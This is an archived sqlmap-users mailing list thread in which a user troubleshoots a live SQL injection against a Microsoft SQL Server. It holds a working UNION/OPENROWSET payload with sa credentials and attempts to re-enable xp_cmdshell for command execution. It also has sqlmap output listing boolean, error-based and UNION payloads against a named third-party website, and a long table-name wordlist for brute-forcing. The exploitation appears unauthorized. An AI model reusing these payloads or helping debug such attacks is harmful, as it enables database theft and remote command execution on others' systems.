my feeling is that "[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an sql error:) so my fault. and regarding the second error, I think you must always return some columns in the query , such as select @@version. now question is how do i embed a string inside another string delimited with quotes? Looks like double quotes is not working.....doubling quote '' looks like not working always.... ________________________________ From: Adi Mutu <adi...@ya...> To: Miroslav Stampar <mir...@gm...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:45 AM Subject: Re: [sqlmap-users] error with ms sql tried, same stuff. I've tried to reenable xp_cmdshell first with master..sp_configure 'show advanced options',1 reconfigure master..sp_configure 'xp_cmdshell',1 reconfigure and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.] then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' and got error: OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:26 AM Subject: Re: [sqlmap-users] error with ms sql try with master..resultabcd i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: Hi Miroslav, > > >got db_name master and tried with master.resultabcd but i get the same error. > > >Kind Regards, >A. > > > >________________________________ > From: Miroslav Stampar <mir...@gm...> >To: Adi Mutu <adi...@ya...> >Cc: "sql...@li..." <sql...@li...> >Sent: Thursday, June 21, 2012 11:11 AM >Subject: Re: [sqlmap-users] error with ms sql > > > >Hi Adi. > > >You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466) > > >Kind regards, >Miroslav Stampar > > >On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >I'm having an injection like this: >>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) >> >> >>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 >> >> >> >>and when I try to select form resultabcd i get: >>[OLE/DB provider returned message: Deferred prepare could not be completed.] >> >> >> >>could not find a good answer with google. Thanks. >> >> >>Kind regards, >>A. >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Adi M. <adi...@ya...> - 2012-06-21 08:45:37
|
tried, same stuff. I've tried to reenable xp_cmdshell first with master..sp_configure 'show advanced options',1 reconfigure master..sp_configure 'xp_cmdshell',1 reconfigure and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.] then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' and got error: OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:26 AM Subject: Re: [sqlmap-users] error with ms sql try with master..resultabcd i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: Hi Miroslav, > > >got db_name master and tried with master.resultabcd but i get the same error. > > >Kind Regards, >A. > > > >________________________________ > From: Miroslav Stampar <mir...@gm...> >To: Adi Mutu <adi...@ya...> >Cc: "sql...@li..." <sql...@li...> >Sent: Thursday, June 21, 2012 11:11 AM >Subject: Re: [sqlmap-users] error with ms sql > > > >Hi Adi. > > >You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466) > > >Kind regards, >Miroslav Stampar > > >On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >I'm having an injection like this: >>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) >> >> >>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 >> >> >> >>and when I try to select form resultabcd i get: >>[OLE/DB provider returned message: Deferred prepare could not be completed.] >> >> >> >>could not find a good answer with google. Thanks. >> >> >>Kind regards, >>A. >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 08:26:28
|
try with master..resultabcd i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: > Hi Miroslav, > > got db_name master and tried with master.resultabcd but i get the same > error. > > Kind Regards, > A. > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:11 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > > I'm having an injection like this: > openrowset in a union (I've managed to do a SELECT @@version on > 192.168.1.4) > > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select > output from resultbcd')),'aaa','15','16','17','18','19','20','21' from > teachers7 where id=808 > > and when I try to select form resultabcd i get: > [OLE/DB provider returned message: Deferred prepare could not be > completed.] > > could not find a good answer with google. Thanks. > > Kind regards, > A. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Adi M. <adi...@ya...> - 2012-06-21 08:24:33
|
Hi Miroslav, got db_name master and tried with master.resultabcd but i get the same error. Kind Regards, A. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:11 AM Subject: Re: [sqlmap-users] error with ms sql Hi Adi. You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466) Kind regards, Miroslav Stampar On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: I'm having an injection like this: >openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) > > >-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 > > > >and when I try to select form resultabcd i get: >[OLE/DB provider returned message: Deferred prepare could not be completed.] > > > >could not find a good answer with google. Thanks. > > >Kind regards, >A. >------------------------------------------------------------------------------ >Live Security Virtual Conference >Exclusive live event will cover all the ways today's security and >threat landscape has changed and how IT managers can respond. Discussions >will include endpoint security, mobile security and the latest in malware >threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >_______________________________________________ >sqlmap-users mailing list >sql...@li... >https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 08:14:17
|
p.s. find the current database name and prepend to the resultbcd (e.g. ........'SELECT output FROM currentdb.resultbcd'........) p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via that OPENROWSET On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >> I'm having an injection like this: >> openrowset in a union (I've managed to do a SELECT @@version on >> 192.168.1.4) >> >> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', >> ( select * from >> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select >> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from >> teachers7 where id=808 >> >> and when I try to select form resultabcd i get: >> [OLE/DB provider returned message: Deferred prepare could not be >> completed.] >> >> could not find a good answer with google. Thanks. >> >> Kind regards, >> A. >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 08:11:49
|
Hi Adi. You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 ) Kind regards, Miroslav Stampar On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > I'm having an injection like this: > openrowset in a union (I've managed to do a SELECT @@version on > 192.168.1.4) > > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select > output from resultbcd')),'aaa','15','16','17','18','19','20','21' from > teachers7 where id=808 > > and when I try to select form resultabcd i get: > [OLE/DB provider returned message: Deferred prepare could not be > completed.] > > could not find a good answer with google. Thanks. > > Kind regards, > A. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Adi M. <adi...@ya...> - 2012-06-21 08:03:19
|
I'm having an injection like this:
openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
and when I try to select form resultabcd i get:
[OLE/DB provider returned message: Deferred prepare could not be completed.]
could not find a good answer with google. Thanks.
Kind regards,
A. |
|
From: Pedrito P. <0ar...@gm...> - 2012-06-21 03:32:41
|
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Authors assume no liability and
are not responsible for any misuse or damage caused by this program
[*] starting at 16:27:50
[16:27:50] [INFO] using 'C:\Users\Admin\Desktop\sqlmap\output\
www.dtvthai.com\session' as session file
[16:27:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:27:50] [INFO] testing connection to the target url
[16:27:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=3) AND 4216=4216 AND (6256=6256
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: Id=3) AND (SELECT 2258 FROM(SELECT
COUNT(*),CONCAT(0x3a656c643a,(SELECT (CASE WHEN (2258=2258) THEN 1 ELSE 0
END)),0x3a6a6a643a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3553=3553
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: Id=3) LIMIT 1,1 UNION ALL SELECT NULL,
CONCAT(0x3a656c643a,0x5877664a584155517a56,0x3a6a6a643a), NULL, NULL, NULL#
---
[16:27:54] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD or Linux FreeBSD 7.3
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[16:27:54] [INFO] fetching database names
[16:27:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: C:\Users\Admin\Desktop\sqlmap\sqlmap.py -u
******************************* --dbs
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
[*] shutting down at 16:27:54
|
|
From: Pedrito P. <0ar...@gm...> - 2012-06-21 03:14:29
|
# Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/) # See the file 'doc/COPYING' for copying permission # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) # List provided by Anastasios Monachos (ana...@gm...) # Various Joomla tables # site:br # site:cn # site:de # site:es # site:fr # site:it # site:jp # site:ru 4images_users ACCOUNT ACL_table ACTOR ACT_INFO ADMIN ALL_USERS ALUM AMUSER ANSWER ANSWER_GROUP ANSWER_GROUP_DETAIL ANTIGUOS ASP ASP.NET AUTHOR AccountXML1 Accounts Action ActiveDataFeed AdminUID Administrator Administratoren Adminlogin Admins Adresse Adressen Affichage1 Affichage1Affichage1edu Affichage1name Agent Aircraft Akten Anhand des Sachgebietes Anmeldung Ansicht1 Apply Articoli Artikel Artiste Assigned_To Assistenten Association AuditableEvent Auftrag Autor Avion BANCOS BANNERDATA BDDJoueurs BDDJoueurs_alliance BDDJoueurs_colonies BID BONUS BOOK BOOKAUTHOR BOOK_AUTHORS BOOK_COPIES BOOK_LOANS BORROWER BRANCH BROWSE BUYER Benutzer Benutzerliste Benutzername Benutzernamen Bestellungen Bilder BlockInfo Booked_On Books Buch CAIXA CATEGORIES CATEGORY CC_info CC_username CENTROS CE_table CLIENTE CLIENTES COLLECT_SITE CONTACT CONTACTTYPE CONTENT COURSE COURSE_SECTION CPG_bridge CPG_categories CPG_config CPG_filetypes CPG_usergroups CPG_users CUENTAS CUSTOMER CUSTOMERS CUST_HIST Campus Can_Fly CategoryGroup Catogorie Channel_Comment Channel_Data CheckType ChemList Chemicals ChicksPass City Class_Def_Table Class_Display_Sequence Classification ClassificationNode ClassificationScheme ClickTrack Clienti ClientsTable CodeRuleType Coefficients Cold ColdFusion ColdFusion8 Collection Compagnie Company Component Config ConsultantsTable Continent Contributor Country CountryCodes1 CurrentUsers CustomNav CustomerCards DATA_ORG DC DC_Data DEMO_ASSIGNMENTS DEMO_PROJECTS DEPARTAMENTO DEPARTAMENTOS DEPARTMENT DEPARTMENTS DEPENDENT DEPENDIENTE DEPT DEPT_LOCATIONS DIM_TYPE DM DOCUMENT_FIELDS DOWNLOADGROUP DOWNLOADS DOWNLOADTYPE DSObject_table DSProp_table DUMMY DWE_Corr_Sets DWE_Corr_Tokens DWE_Delay_Timers DWE_Internal_Task_Attributes DWE_Internal_WF_Attributes DWE_Max_Id DWE_Meta_Data DWE_Org_Resources DWE_Organizations DWE_Predecessors DWE_Resource_Attributes DWE_Resource_Roles DWE_Resources DWE_Roles DWE_Subscriptions DWE_Task_Attributes DWE_Tasks DWE_WF_Attributes DWE_Workflow_Documents DWE_Workflows D_Abbreviation D_Comment D_EM_DESTINATARIO D_FA_ITENS D_FA_PARCELAS D_Format D_Format_Data D_PR_ADVOGADOS D_PR_APENSOS D_PR_CUSTAS D_PR_DESDOBRAMENTOS D_PR_DOCUMENTOS D_PR_EVENTOS D_PR_GARANTIAS D_PR_HONORARIOS D_PR_OBJETOS D_PR_PARCELAMENTO D_PR_PARTES D_SE_INDICES D_US_AREA_DE_TRABALHO D_US_EQUIPES_DO_USUARIO D_US_FAVORITOS D_US_RECENTE D_Unit DataFeedPerformance1 DataFeedPerformance2 DataFeedPerformance2_incoming DataFeedShowtag1 DataFeedShowtag2 DataFeedShowtag2_incoming DatabaseInfo Decimation Defect Departure Description Descriptions Descriptions_Languages Descriptions_Regions Descriptions_Scripts Descriptions_Variants Desert Device Domain Dragon_users EDITEUR EMAIL EMP EMPLEADO EMPLEADOS EMPLOYEE EMPLOYEES ENQUIRY ENROLLMENT EPIXEIRISI ERDESIGNER_VERSION_ID Economy Editor Einstellungen EmailAddress Enseignant Equipe Equipment EthnicGroup Etudiant Event EventRedirect Event_Category Event_backup Events_new ExternalIdentifier ExternalLink Extlangs ExtrinsicObject FACTSHEET FORM FORM_QUESTION FUND FUNDGROUP Factory_Master Factory_Output Film Filme FindCriteria Firma FirstName Flight FoundLists FoundThumbs Fusion Fusion8 GDirectedRoute GLI_profiles GROUP GRouteDetail Gallery GalleryThumb Genre Gruppe Gruppen HISTORY Händler IDIOTIS INSTITUTE INVENTORY ITEM Inhalt InstanceStringTable Institution Island JamPass Joueur KARTA KUNDE Kategorie Keyword Kontakt Kontakte Konten Konto Kontrolle Kunden Kunst LIBRARY_BRANCH LINEITEM LOCALIZACIONES_DEPT LOCATION LT_CATEGORIA LT_CLASSE_FORO LT_CUSTOM1 LT_CUSTOM2 LT_CUSTOM3 LT_CUSTOM4 LT_DECISAO LT_ENCERRAMENTO LT_EQUIPES LT_EVENTO LT_FASE LT_FOROS LT_GARANTIA LT_GRUPO LT_JURISDICAO LT_LANCAMENTO LT_METODO_ATUALIZACAO LT_NATUREZA LT_OBJETO LT_PROCEDIMENTO LT_PROGNOSTICO LT_SERIE LT_SITUACAO LT_TIPO_DE_ACAO Lake Land Language Languages LastDate LastLoginDate LastName Lieu de la manifestation Lieux LimitTest2 Link_table Linkdesc_table Login LoginID LoginIP Logins MANAGEMENTGROUP MEMBER MM_NOTIFICACOES_DO_PROCESSO MM_USUARIOS_DO_PROCESSO MOMENT MOVIMIENTOS MSmerge_altsyncpartners MSmerge_errorlineage MSrepl_identity_range M_CADASTRO_GERAL M_CUBOS M_EMAIL_FILA M_ESQUEMA_HORARIO M_ESQUEMA_PERMISSAO M_FATURAS M_FERIADOS M_PROCESSOS M_RELATORIOS M_SERVICOS_PRESTADOS M_USUARIO Market MetadataFieldRegistry MetadataSchemaRegistry MetadataValue Microsoft Mitarbeiter Mitglied Mitglieder Mitgliederbereich Mitgliederliste Model MonitorStatus Mountain MountainOnIsland MyTicketek MyTicketekArchive NUEVOS Name Namen News NextID_table Nombre total de membres ORDERITEMS ORDERLINES ORDERS ORDERSTATUS Offices OperationStatus Organization PART PEDIDOS PERMISSION PERMISSIONS PERSON PERSONAL PN PN_Data POINT POINT_SET POSITION PREFIX_access PREFIX_category_group PREFIX_configuration PREFIX_customer_group PREFIX_group PREFIX_group_lang PREFIX_order_return_state PREFIX_order_return_state_lang PREFIX_product_attribute_image PREFIX_search_engine PREFIX_tab PREFIX_tab_lang PREFIX_timezone PRODUCT PRODUCTOS PRODUTO PROFESORES PROFILE PROJECT PROYECTO PS_DMK PUBLISHER PZ PZ_Data Parameter Parametre Parts Passwords by usage count Passwort Passwörter Passwörter durch Nutzung zählen Path Pays PerfPassword PerfPasswordAllSelected Personne Pilot Plane Poles_Zeros Politics Polynomial Population PostalAddress Pr?f?rencesUtilisateur Prefixes Priority Products Professoren ProjectsTable Promotion PropColumnMap Propdesc_table Property Protokolle Province ProxyDataFeedPerformance ProxyDataFeedShowtag ProxyPriceInfo Pr?f?rencesUtilisateur Publication Purchases Pässe QRTZ_BLOB_TRIGGERS QRTZ_CALENDARS QRTZ_CRON_TRIGGERS QRTZ_FIRED_TRIGGERS QRTZ_JOB_DETAILS QRTZ_JOB_LISTENERS QRTZ_LOCKS QRTZ_PAUSED_TRIGGER_GRPS QRTZ_SCHEDULER_STATE QRTZ_SIMPLE_TRIGGERS QRTZ_TRIGGERS QRTZ_TRIGGER_LISTENERS QUESTION R1IDF R1Length R1Size R1Sum R1TF R1Weights R2IDF R2Length R2ODTMAP R2Size R2Sum R2TF R2Weights RATING RECORD REORDER ROLE ROLE_PERM Region Regions RegistryPackage Religion River Room S2ODTMAP SALES SALGRADE SCALE SCRIPT SELLER SEQUENCE SGA_XPLAN_TPL_DBA_CONSTRAINTS SGA_XPLAN_TPL_DBA_CONS_COLUMNS SGA_XPLAN_TPL_DBA_INDEXES SGA_XPLAN_TPL_DBA_IND_COLUMNS SGA_XPLAN_TPL_DBA_TABLES SGA_XPLAN_TPL_DBA_TAB_COLS SGA_XPLAN_TPL_V$SQL SGA_XPLAN_TPL_V$SQLTEXT_NL SGA_XPLAN_TPL_V$SQL_PLAN SGA_XPLAN_TPL_V$SQL_PLAN_SALL SGA_XPLAN_TPL_V$SQL_PLAN_STAT SIGNON SMS_TABLE SPACE SPJ SQLDATES SS_orders SUBSCRIBE SUCURSALES SUPPLIER SUPPORT_INCIDENTS SYNALLAGI S_GLOBAL S_LOG S_ORIGENS S_PARAMETROS S_SEQUENCIAS S_SESSOES SalesReps SchemaInfo Scripts Sea SearchOptions SecurityLevel Sensitivity Serie Series Service ServiceBinding Session Settings Severity Sheldonshows Simple_Response SiteLogin Site_Login Sitzungen Slot Sondage SpecialityTable SpecificationLink Staaten Standorte StateList StateType States Station_Comment Station_Data Statistiken Status Stein Liste StringTable Student Studenten Students SubCategory Subject Subjects Suchoptionen Sujets Survey SurveyAnswer SurveyAnswerOpen SurveyQuestion SurveyRespondent Systemadministratoren TABLE_PRIVILEGE_MAP TBLCORPORATEUSERS TBLCORPUSERS TBLLIST TBLLOG TBLPROFILES TBLREPORTS TBLRETAILUSERS TBLTRANSACTIONS TBLUSERS TERM THOT_ALPHA THOT_CATEGORY THOT_CONCEPT THOT_DEEP THOT_LANGUAGE THOT_SOURCE THOT_SUB_MENU THOT_TARGET THOT_THEME THOT_TYPE THOT_YEAR TIL_IDIOTON TIME TRABAJA_EN Tabellen Table Tagebuch Tagung Tasks TelephoneNumber Thumbnail ThumbnailKeyword Ticket System Acc Numbers Ticket-System ACC-Nummern TimeDiff Tisch Titel Titles Titres ToPacmail1 ToPacmail2 Total Members TotalMembers Transactions TypeRule TypesTab UM_PERMISSIONS UM_ROLES UM_ROLE_ATTRIBUTES UM_ROLE_PERMISSIONS UM_USERS UM_USER_ATTRIBUTES UM_USER_PERMISSIONS UM_USER_ROLES USER USER_GROUP USUARIO Umfrage UnterkKlasse UsageDescription UsageParameter UserAdmin UserCapability UserFields UserFieldsInfo UserPreferences UserRole UserType User_ Users Utilisateurs VIEW1 Variants Venue VenuesNew Veranstaltungsort Veranstaltungsorte Verwaltung Volume Vorlesungen WORKS_ON WROTE Webbenutzer Webmaster Webuser WidgetDescriptions WidgetPrices WidgetReferences Widgets X_3945 ZENTRACK_VARFIELD ZENTRACK_VARFIELD_IDX _wfspro_admin a_admin abstract acc_trans access accessTable access_control accnt accnts account_level account_log account_map account_map_event account_multi account_permissions account_temp account_transaction accountuser acctmanager acctmanager2 action_attribute action_element actions activity actualites ad ad_ad ad_locales adblocks add_irm address address_book address_format addressbookgrp addresses adm admin_id admin_login admin_logs admin_name admin_pass admin_password admin_psw admin_pwd admin_user admin_userid admin_userinfo admin_username adminid administer administrable administrables administrate administrateur administrateurs administration administrators administrer administrieren adminname adminpass adminpassword adminpaw adminpsw adminpwd adminrights adminstbl admintbl adminupass adminuser adminuserid adminusername admuserinfo ads adv affiliateUsers agence agencia agenda agent_specialty aggtest aidf akhbar alarms album alerts alias aliasregex aliastype allocation alltypes anagrafica answerOption ap apartments appVersions app_user applications apwd ar archive archtypes area areas argomento array_data array_probe array_test art article article_admin articles articulos artifact artikel_bestellung artikel_kategorie artikel_optionen artikel_variationen artikel_variationsgruppen artist arxeia ask asse assembly assignment atividade attivita attribut attributeCategory attrs audio audit audittrail auid aut auteur auth authenticate authentication authors auto_id_tests autore autorizacaonfe backend backend_users backenduser backgroundJob_table backup badspy banned_users banner banners basePlusCommissionEmployees bayview bayviewpath bbs be_groups be_users belong bestellung bestellung_kunde binaries binn_articles binn_articles_messages binn_articles_temps binn_bann binn_bann_pages binn_bann_restricted binn_bann_temps binn_basket binn_basket_templ binn_cache binn_calendar_temps binn_catalog_fields binn_catalog_template binn_categs binn_catlinks binn_catprops binn_catrights binn_cform binn_cform_list binn_cform_settings binn_cform_textarea binn_ct_templ binn_ct_templ_elems binn_docs binn_docs_temps binn_faq binn_faq_temps binn_form39 binn_forms_fields binn_forms_templ binn_forms_templ_elems binn_forum_maillist binn_forum_posts binn_forum_settings binn_forum_temps binn_forum_themes_temps binn_forum_threads binn_imagelib binn_imagelib_templ binn_maillist binn_maillist_sent binn_maillist_settings binn_maillist_temps binn_menu binn_menu_templ binn_menu_tlevel binn_news binn_news_temps binn_order binn_order_elems binn_order_temps binn_page_elems binn_pages binn_path_temps binn_rubrikator_temps binn_rubrikator_tlevel binn_search_temps binn_settings binn_site_users binn_site_users_rights binn_site_users_temps binn_sprav binn_sprav_temps binn_submit_timeout binn_system_log binn_system_messages binn_template_elems binn_templates binn_texts binn_update binn_user_rights binn_users binn_vote binn_vote_options binn_vote_results binn_vote_temps biosample bkp_Item bkp_ItemPresentation bkp_ItemReference bkp_ItemReplication bkp_ItemResource bkp_RS_Clusters bkp_RS_Servers bkp_ResourceFolder bkp_String blacklist bldg_types blobs bombing bookings booleantests borders buecher bugs builds bulletin business calendar calendario cameFromTable cards cart cart_table catalog catalogue categoria categorias categorie categories_posts categoryNames categorylinks cc_config cdb_access cdb_activities cdb_activityapplies cdb_adminactions cdb_admingroups cdb_adminnotes cdb_adminsessions cdb_advertisements cdb_announcements cdb_attachments cdb_attachpaymentlog cdb_attachtypes cdb_banned cdb_bbcodes cdb_buddys cdb_caches cdb_campaigns cdb_creditslog cdb_crons cdb_debateposts cdb_debates cdb_failedlogins cdb_faqs cdb_favorites cdb_forumfields cdb_forumlinks cdb_forumrecommend cdb_forums cdb_imagetypes cdb_invites cdb_itempool cdb_magiclog cdb_magicmarket cdb_magics cdb_medals cdb_memberfields cdb_membermagics cdb_members cdb_memberspaces cdb_moderators cdb_modworks cdb_myposts cdb_mythreads cdb_onlinelist cdb_onlinetime cdb_orders cdb_paymentlog cdb_pluginhooks cdb_plugins cdb_pluginvars cdb_pms cdb_pmsearchindex cdb_polloptions cdb_polls cdb_posts cdv_allele_curated_allele cdv_curated_allele cdv_curation cdv_map_feature cdv_marker cdv_passport_group cdv_passport_set cdv_reason cell_line certificates cfg changePrix changeTva channelitems channels chart chat chat_config chat_messages chat_users chatbox checksum_history checksum_results chessgames chesshistory chessmessages child_config_traffic_selector child_configs child_test chip_layout chromosomes ci_slogans cia cidadao cidade cidades cities client clients clubconfig clubs cmAvailableServiceBinding cmAvailableServiceBindingSiteNodeTypeDefinition cmContent cmContentRelation cmContentTypeDefinition cmContentVersion cmContentVersionDigitalAsset cmDigitalAsset cmEvent cmLanguage cmPublication cmPublicationDetail cmQualifyer 